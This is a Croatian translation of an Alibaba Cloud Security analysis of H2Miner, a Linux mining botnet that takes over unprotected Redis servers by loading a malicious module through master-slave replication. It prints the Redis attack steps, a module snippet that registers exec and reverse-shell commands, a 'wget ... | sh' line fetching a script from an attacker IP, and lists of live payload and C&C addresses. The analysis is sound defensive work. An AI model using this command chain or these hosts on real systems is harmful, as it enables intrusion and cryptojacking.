Prije jedan dan, jedan od poslužitelja mog projekta napao je sličan crv. U potrazi za odgovorom na pitanje "što je to bilo?" Pronašao sam sjajan članak Alibaba Cloud Security tima. Budući da ovaj članak nisam pronašao na Habréu, odlučio sam ga prevesti posebno za vas <3
Ulazak
Nedavno je sigurnosni tim Alibaba Clouda otkrio iznenadnu pojavu H2Minera. Ova vrsta zlonamjernog crva koristi nedostatak autorizacije ili slabe lozinke za Redis kao pristupnike vašim sustavima, nakon čega sinkronizira vlastiti zlonamjerni modul sa podređenim putem master-slave sinkronizacije i konačno preuzima taj zlonamjerni modul na napadnuto računalo i izvršava zlonamjerni upute.
U prošlosti su se napadi na vaše sustave primarno izvodili metodom koja uključuje planirane zadatke ili SSH ključeve koji su bili upisani na vaše računalo nakon što se napadač prijavio na Redis. Srećom, ova se metoda ne može često koristiti zbog problema s kontrolom dopuštenja ili zbog različitih verzija sustava. Međutim, ova metoda učitavanja zlonamjernog modula može izravno izvršiti napadačeve naredbe ili dobiti pristup ljusci, što je opasno za vaš sustav.
Zbog velikog broja Redis poslužitelja koji se nalaze na internetu (gotovo 1 milijun), sigurnosni tim Alibaba Clouda, kao prijateljski podsjetnik, preporuča korisnicima da ne dijele Redis online i da redovito provjeravaju snagu svojih lozinki i jesu li ugrožene. brz odabir.
H2Miner
H2Miner je rudarski botnet za sustave temeljene na Linuxu koji može napasti vaš sustav na različite načine, uključujući nedostatak autorizacije u ranjivostima Hadoop yarn, Docker i Redis daljinsko izvršavanje naredbi (RCE). Botnet radi preuzimanjem zlonamjernih skripti i zlonamjernog softvera za rudarenje vaših podataka, horizontalno širenje napada i održavanje komunikacije zapovijedanja i kontrole (C&C).
Redis RCE
Znanje o ovoj temi podijelio je Pavel Toporkov na ZeroNights 2018. Nakon verzije 4.0, Redis podržava značajku učitavanja dodataka koja korisnicima daje mogućnost učitavanja datoteka kompajliranih s C-om u Redis kako bi izvršili određene Redis naredbe. Ova funkcija, iako korisna, sadrži ranjivost u kojoj se, u master-slave modu, datoteke mogu sinkronizirati sa slave putem fullresync moda. To napadač može iskoristiti za prijenos zlonamjernih datoteka. Nakon što je prijenos završen, napadači učitavaju modul na napadnutu Redis instancu i izvršavaju bilo koju naredbu.
Analiza crva zlonamjernog softvera
Nedavno je Alibaba Cloud sigurnosni tim otkrio da se veličina H2Miner grupe zlonamjernih rudara iznenada dramatično povećala. Prema analizi, opći proces nastanka napada je sljedeći:
H2Miner koristi RCE Redis za potpuni napad. Napadači prvo napadaju nezaštićene Redis poslužitelje ili poslužitelje sa slabim lozinkama.
Zatim koriste naredbu config set dbfilename red2.so za promjenu naziva datoteke. Nakon toga napadači izvršavaju naredbu slaveof za postavljanje glavne-podređene adrese glavnog računala replikacije.
Kada napadnuta instanca Redisa uspostavi master-slave vezu sa zlonamjernim Redisom koji je u vlasništvu napadača, napadač šalje zaraženi modul pomoću naredbe fullresync za sinkronizaciju datoteka. Datoteka red2.so tada će biti preuzeta na napadnuto računalo. Napadači zatim koriste modul za učitavanje ./red2.so za učitavanje ove so datoteke. Modul može izvršavati naredbe od napadača ili pokrenuti obrnutu vezu (backdoor) za pristup napadnutom računalu.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Nakon izvršenja zlonamjerne naredbe kao što je / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, napadač će poništiti naziv datoteke sigurnosne kopije i isprazniti sistemski modul kako bi očistio tragove. Međutim, datoteka red2.so i dalje će ostati na napadnutom računalu. Korisnicima se savjetuje da obrate pozornost na prisutnost takve sumnjive datoteke u mapi svoje Redis instance.
Osim što je ubio neke zlonamjerne procese kako bi ukrao resurse, napadač je slijedio zlonamjernu skriptu preuzimanjem i izvršavanjem zlonamjernih binarnih datoteka na . To znači da naziv procesa ili naziv direktorija koji sadrži srodstvo na glavnom računalu može značiti da je taj stroj zaražen ovim virusom.
Prema rezultatima obrnutog inženjeringa, zlonamjerni softver uglavnom obavlja sljedeće funkcije:
- Učitavanje datoteka i njihovo izvršavanje
- Rudarstvo
- Održavanje C&C komunikacije i izvršavanje napadačkih naredbi
Koristite masscan za vanjsko skeniranje kako biste proširili svoj utjecaj. Osim toga, IP adresa C&C poslužitelja tvrdo je kodirana u programu, a napadnuti host će komunicirati s C&C komunikacijskim poslužiteljem koristeći HTTP zahtjeve, gdje se informacija o zombi (kompromitiranom poslužitelju) identificira u HTTP zaglavlju.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Druge metode napada
Adrese i veze koje koristi crv
/srodstvo
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
vijeće
Prvo, Redis ne bi trebao biti dostupan s interneta i trebao bi biti zaštićen jakom lozinkom. Također je važno da klijenti provjere da nema datoteke red2.so u Redis direktoriju i da nema "kinsinga" u nazivu datoteke/procesa na hostu.
Izvor: www.habr.com